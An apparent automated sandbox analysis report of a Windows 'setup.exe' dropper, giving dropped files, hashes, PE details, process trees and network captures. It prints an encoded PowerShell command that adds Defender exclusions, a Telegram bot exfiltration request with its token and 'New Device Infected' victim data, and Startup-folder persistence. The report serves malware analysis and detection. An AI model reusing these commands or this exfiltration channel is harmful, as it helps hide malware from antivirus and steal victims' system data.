                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....F.]..................`..nf.......`.......`...@..........................P.......>...........@....................d...... d..>...`n.V.9...................e.TQ...p........................d......................+d......`d.xh...................text....`.......`................. ..`.itext...-....`.......`............. ..`.data.........`.......`.............@....bss........pb..........................idata...>... d..@...Vb.............@....didata.xh...`d..j....b.............@....edata........d.......c.............@..@.tls....H.....d..........................rdata..].....d.......c.............@..@.reloc..TQ....e..R....c.............@..B.rsrc...V.9..`n...9..Vl.............@..@.debug....!..p....!..Z..............@..@................

                                    C:\Users\user\AppData\Local\Temp\svchost.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):551084
                                    Entropy (8bit):6.910089088384593
                                    Encrypted:false
                                    SSDEEP:12288:Rn0LIyy/LMIsHZo6gM2WX4P3p9b9fi/DIAhijXlQ:wI3IIs5o6H2WXQ3p9li/DP4Q
                                    MD5:487267C7B1B9BB3029AD15AAF79827A2
                                    SHA1:E0A3DF69D90D8C3020FD4EB93BE65E9711F78125
                                    SHA-256:C466AD3096266AE1DA89D86EC2D4C4CAD2391396713722AF800A7239FF1FCEC4
                                    SHA-512:839BD92F35F3A9DEFD28B6CAA8F0E4F6B915CE398A3354B5620DB1E9D9C5EA6271CA210C1110588C09DC4CF727C0AD2947C1E36DFE6D489007301263C120E102
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......{..?..W?..W?..W..(W7..W..*W...W..+W2..W/.$W=..W/..V5..W/..V-..W/..V...W6.ZW6..W6.^W=..W6.JW8..W?..W...Wt..V...Wt..V>..Wt.&W>..Wt..V>..WRich?..W........................PE..d.....Xg.........."....).d...,.......(.........@..........................................`............................................4...$...P.......X........0..............d...p4..T....................6..(.......@....................... ....................text....c.......d.................. ..`.rdata..L*.......,...h..............@..@.data...............................@....pdata...0.......2..................@..@.didat..h...........................@....rsrc...X...........................@..@.reloc..d...........................@..B................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tg.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):90112
                                    Entropy (8bit):6.718119277627621
                                    Encrypted:false
                                    SSDEEP:1536:r7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf4xQ1HpOK:nq6+ouCpk2mpcWJ0r+QNTBf4o/
                                    MD5:F8ECEDC88E4D2776486231D0EF0AEA5D
                                    SHA1:FCCC180C84DEC726668D48F09B8A0C1C1FBA07A1
                                    SHA-256:B5C30A14E79065EA9A095ECA6655829ACA6272E61B1A73A31FA376FF8B3A793B
                                    SHA-512:0AA1F775851A400ED6513DB836F2788C0D902FB492B91195C234D1067E548BDAC202E69CD3E366D1C73C0DB917C474E93F38F20173C38A78C4BA6804A364FA41
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\tg.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 24%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....P...............0....@.........................................................................|q......................................................................................pt..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3...0...4..................@..@.data...,....p.......D..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                    Entropy (8bit):7.373879840623396
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:setup.exe
                                    File size:30'661'632 bytes
                                    MD5:9ee966ddff608734b5b15cd5f1d810d8
                                    SHA1:0b3477a4e740c78a0fbb479353cd068c998ead6f
                                    SHA256:5f82e21c783da05e616618ac9aca0dc5b240bcb3dbf15c4d2d07d19fe57bc056
                                    SHA512:989ad5ef520ba05bc4086ffa754bf367467677982c9189399568122560ab8f98c5aca807334bd453c1bf74deaff8b1614aa66ef9fea66b66c9226ad2721b4954
                                    SSDEEP:393216:2+qBLQ7qUVsWKjm9I+dhNHMwwCGl8Xh2Y1bL0vXK/ZKXJnMgORT:Y+vsWKjm9fPU8xYx2N
                                    TLSH:97676BAA14C3487491D86AC6D47CE94542BBAE8C7854F8BA496FFC9F7320CB134364B7
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@........................................................................

                                    File Icon

                                    Icon Hash:0f6d1a92b25b290f

                                    Static PE Info

                                    General

                                    Entrypoint:0x401515
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:6f462fcc6b830b77fb3fef2add9dc570

                                    Entrypoint Preview

                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000008h
                                    nop
                                    mov eax, 00000004h
                                    push eax
                                    mov eax, 00000000h
                                    push eax
                                    lea eax, dword ptr [ebp-04h]
                                    push eax
                                    call 00007FF68CBB3DF1h
                                    add esp, 0Ch
                                    mov eax, 004014F3h
                                    push eax
                                    call 00007FF68CBB3E2Bh
                                    mov eax, 00000001h
                                    push eax
                                    call 00007FF68CBB3E28h
                                    add esp, 04h
                                    mov eax, 00030000h
                                    push eax
                                    mov eax, 00010000h
                                    push eax
                                    call 00007FF68CBB3E1Ch
                                    add esp, 08h
                                    mov eax, dword ptr [021119C8h]
                                    mov ecx, dword ptr [021119CCh]
                                    mov edx, dword ptr [021119D0h]
                                    mov dword ptr [ebp-08h], eax
                                    lea eax, dword ptr [ebp-04h]
                                    push eax
                                    mov eax, dword ptr [02112000h]
                                    push eax
                                    push edx
                                    push ecx
                                    mov eax, dword ptr [ebp-08h]
                                    push eax
                                    call 00007FF68CBB3DF6h
                                    add esp, 14h
                                    mov eax, dword ptr [021119C8h]
                                    mov ecx, dword ptr [021119CCh]
                                    mov edx, dword ptr [021119D0h]
                                    mov dword ptr [ebp-08h], eax
                                    mov eax, dword ptr [edx]
                                    push eax
                                    mov eax, dword ptr [ecx]
                                    push eax
                                    mov eax, dword ptr [ebp-08h]
                                    mov eax, dword ptr [eax]
                                    push eax
                                    call 00007FF68CBB3BCCh
                                    add esp, 0Ch
                                    push eax
                                    call 00007FF68CBB3DCCh
                                    add esp, 04h
                                    leave
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000004h
                                    nop
                                    mov eax, dword ptr [021119C8h]
                                    mov ecx, dword ptr [ebp+08h]
                                    mov dword ptr [eax], ecx
                                    mov eax, dword ptr [00000000h]

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1d119500x50.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d130000x2d390.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x1d119a00x5c.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x6b00x800eb0594d6b53cdfff17c9a6a95890d294False0.4287109375data4.8527305351991865IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x20000x1d0fb640x1d0fc00609f033012c02a38a48c6fb9be86635bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .bss0x1d120000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1d130000x2d3900x2d4002679d5256ec5c4f0af633c89e3a44599False0.26409810946132595data4.303365423073692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1d132c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/mEnglishUnited States0.42109929078014185
                                    RT_ICON0x1d137300x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/mEnglishUnited States0.3454918032786885
                                    RT_ICON0x1d140b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/mEnglishUnited States0.3018292682926829
                                    RT_ICON0x1d151600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/mEnglishUnited States0.22562240663900415
                                    RT_ICON0x1d177080x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/mEnglishUnited States0.1877066603684459
                                    RT_ICON0x1d1b9300x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/mEnglishUnited States0.18553604436229204
                                    RT_ICON0x1d20db80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/mEnglishUnited States0.1577675005255413
                                    RT_ICON0x1d2a2600x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/mEnglishUnited States0.1355879569383651
                                    RT_ICON0x1d3aa880x538bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9974751016972927
                                    RT_GROUP_ICON0x1d3fe180x84dataEnglishUnited States0.7121212121212122
                                    RT_VERSION0x1d3fea00x248dataEnglishUnited States0.488013698630137
                                    RT_MANIFEST0x1d400e80x2a6XML 1.0 document, ASCII textEnglishUnited States0.46755162241887904

                                    Imports

                                    DLLImport
                                    msvcrt.dllmalloc, _sleep, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                    shell32.dllShellExecuteA
                                    kernel32.dllSetUnhandledExceptionFilter

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 23, 2024 01:05:15.794821978 CET49730443192.168.2.4104.26.13.205
                                    Dec 23, 2024 01:05:15.794907093 CET44349730104.26.13.205192.168.2.4
                                    Dec 23, 2024 01:05:15.794992924 CET49730443192.168.2.4104.26.13.205
                                    Dec 23, 2024 01:05:15.909390926 CET49730443192.168.2.4104.26.13.205
                                    Dec 23, 2024 01:05:15.909432888 CET44349730104.26.13.205192.168.2.4
                                    Dec 23, 2024 01:05:17.129975080 CET44349730104.26.13.205192.168.2.4
                                    Dec 23, 2024 01:05:17.130280972 CET49730443192.168.2.4104.26.13.205
                                    Dec 23, 2024 01:05:17.138079882 CET49730443192.168.2.4104.26.13.205
                                    Dec 23, 2024 01:05:17.138115883 CET44349730104.26.13.205192.168.2.4
                                    Dec 23, 2024 01:05:17.138529062 CET44349730104.26.13.205192.168.2.4
                                    Dec 23, 2024 01:05:17.154654026 CET49730443192.168.2.4104.26.13.205
                                    Dec 23, 2024 01:05:17.199378967 CET44349730104.26.13.205192.168.2.4
                                    Dec 23, 2024 01:05:17.561839104 CET44349730104.26.13.205192.168.2.4
                                    Dec 23, 2024 01:05:17.561917067 CET44349730104.26.13.205192.168.2.4
                                    Dec 23, 2024 01:05:17.567040920 CET49730443192.168.2.4104.26.13.205
                                    Dec 23, 2024 01:05:17.726999998 CET49730443192.168.2.4104.26.13.205
                                    Dec 23, 2024 01:05:21.941200972 CET49734443192.168.2.4149.154.167.220
                                    Dec 23, 2024 01:05:21.941293001 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:21.941373110 CET49734443192.168.2.4149.154.167.220
                                    Dec 23, 2024 01:05:21.944108963 CET49734443192.168.2.4149.154.167.220
                                    Dec 23, 2024 01:05:21.944144964 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:23.312902927 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:23.312980890 CET49734443192.168.2.4149.154.167.220
                                    Dec 23, 2024 01:05:23.317584991 CET49734443192.168.2.4149.154.167.220
                                    Dec 23, 2024 01:05:23.317611933 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:23.318121910 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:23.324533939 CET49734443192.168.2.4149.154.167.220
                                    Dec 23, 2024 01:05:23.367376089 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:23.685858965 CET49734443192.168.2.4149.154.167.220
                                    Dec 23, 2024 01:05:23.685899973 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:23.933274031 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:24.115181923 CET49734443192.168.2.4149.154.167.220
                                    Dec 23, 2024 01:05:24.266578913 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:24.266693115 CET44349734149.154.167.220192.168.2.4
                                    Dec 23, 2024 01:05:24.266817093 CET49734443192.168.2.4149.154.167.220
                                    Dec 23, 2024 01:05:24.267558098 CET49734443192.168.2.4149.154.167.220

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 23, 2024 01:05:15.573893070 CET5627953192.168.2.41.1.1.1
                                    Dec 23, 2024 01:05:15.710854053 CET53562791.1.1.1192.168.2.4
                                    Dec 23, 2024 01:05:21.796813011 CET5899853192.168.2.41.1.1.1
                                    Dec 23, 2024 01:05:21.934802055 CET53589981.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 23, 2024 01:05:15.573893070 CET192.168.2.41.1.1.10x67e0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                    Dec 23, 2024 01:05:21.796813011 CET192.168.2.41.1.1.10xa7c7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 23, 2024 01:05:15.710854053 CET1.1.1.1192.168.2.40x67e0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                    Dec 23, 2024 01:05:15.710854053 CET1.1.1.1192.168.2.40x67e0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                    Dec 23, 2024 01:05:15.710854053 CET1.1.1.1192.168.2.40x67e0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                    Dec 23, 2024 01:05:21.934802055 CET1.1.1.1192.168.2.40xa7c7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • api.ipify.org
                                    • api.telegram.org

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730104.26.13.2054437524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-23 00:05:17 UTC170OUTGET /?format=text HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                    Host: api.ipify.org
                                    Connection: Keep-Alive
                                    2024-12-23 00:05:17 UTC424INHTTP/1.1 200 OK
                                    Date: Mon, 23 Dec 2024 00:05:17 GMT
                                    Content-Type: text/plain
                                    Content-Length: 12
                                    Connection: close
                                    Vary: Origin
                                    cf-cache-status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 8f64195fbeb6433f-EWR
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1656&rtt_var=631&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=784&delivery_rate=1763285&cwnd=219&unsent_bytes=0&cid=b1942cbc8cdf2056&ts=446&x=0"
                                    2024-12-23 00:05:17 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                    Data Ascii: 8.46.123.189


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.449734149.154.167.2204438104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-23 00:05:23 UTC315OUTPOST /bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: api.telegram.org
                                    Content-Length: 260
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    2024-12-23 00:05:23 UTC260OUTData Raw: 63 68 61 74 5f 69 64 3d 36 37 33 34 39 38 35 37 30 35 26 74 65 78 74 3d 2b 25 34 30 4e 65 77 2b 44 65 76 69 63 65 2b 49 6e 66 65 63 74 65 64 21 21 21 25 32 43 2b 2b 49 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 41 2b 44 61 74 65 25 33 41 2b 32 30 32 34 2d 31 32 2d 32 32 2b 31 39 25 33 41 30 35 25 33 41 35 31 25 32 43 2b 2b 48 6f 73 74 6e 61 6d 65 25 33 41 2b 4a 4f 4e 45 53 2d 50 43 25 32 43 2b 4f 53 25 33 41 2b 2b 57 69 6e 33 32 4e 54 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 31 30 2e 30 2e 31 39 30 34 35 2e 30 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 4e 54 2b 31 30 2e 30 2e 31 39 30 34 35 2e 30 25 32 43 2b 2b 41 72 63 68 69 74 65 63 74 75 72 65 25 33 41 2b 36 34 2d 62 69 74 25 32 43 2b 2b 50 75 62 6c 69 63 2b 49 50 25 33 41 2b 38 2e 34 36 2e 31 32
                                    Data Ascii: chat_id=6734985705&text=+%40New+Device+Infected!!!%2C++Information%3A+Date%3A+2024-12-22+19%3A05%3A51%2C++Hostname%3A+user-PC%2C+OS%3A++Win32NT+++++++++++++10.0.19045.0+Microsoft+Windows+NT+10.0.19045.0%2C++Architecture%3A+64-bit%2C++Public+IP%3A+8.46.12
                                    2024-12-23 00:05:23 UTC25INHTTP/1.1 100 Continue
                                    2024-12-23 00:05:24 UTC882INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Mon, 23 Dec 2024 00:05:24 GMT
                                    Content-Type: application/json
                                    Content-Length: 494
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    {"ok":true,"result":{"message_id":42,"from":{"id":7879910740,"is_bot":true,"first_name":"catch","username":"catch2025_bot"},"chat":{"id":6734985705,"first_name":"R","username":"cjsjdjja","type":"private"},"date":1734912323,"text":"@New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189","entities":[{"offset":195,"length":12,"type":"url"}]}}


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:19:05:05
                                    Start date:22/12/2024
                                    Path:C:\Users\user\Desktop\setup.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\setup.exe"
                                    Imagebase:0x400000
                                    File size:30'661'632 bytes
                                    MD5 hash:9EE966DDFF608734B5B15CD5F1D810D8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:19:05:06
                                    Start date:22/12/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA="
                                    Imagebase:0x620000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:19:05:06
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:19:05:07
                                    Start date:22/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                    Imagebase:0x7ff669aa0000
                                    File size:551'084 bytes
                                    MD5 hash:487267C7B1B9BB3029AD15AAF79827A2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:19:05:08
                                    Start date:22/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\tg.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\tg.exe"
                                    Imagebase:0x400000
                                    File size:90'112 bytes
                                    MD5 hash:F8ECEDC88E4D2776486231D0EF0AEA5D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\tg.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 24%, ReversingLabs
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:5
                                    Start time:19:05:08
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:6
                                    Start time:19:05:08
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:7
                                    Start time:19:05:09
                                    Start date:22/12/2024
                                    Path:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
                                    Imagebase:0x400000
                                    File size:187'392 bytes
                                    MD5 hash:A3027B4F632E949EF06C151BD8787FAF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 63%, ReversingLabs
                                    • Detection: 69%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:19:05:09
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
                                    Imagebase:0x510000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:19:05:09
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:19:05:09
                                    Start date:22/12/2024
                                    Path:C:\ProgramData\svchost\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\ProgramData\svchost\svchost.exe" --run
                                    Imagebase:0x400000
                                    File size:187'392 bytes
                                    MD5 hash:A3027B4F632E949EF06C151BD8787FAF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 63%, ReversingLabs
                                    • Detection: 69%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:11
                                    Start time:19:05:10
                                    Start date:22/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\client.exe
                                    Wow64 process (32bit):true
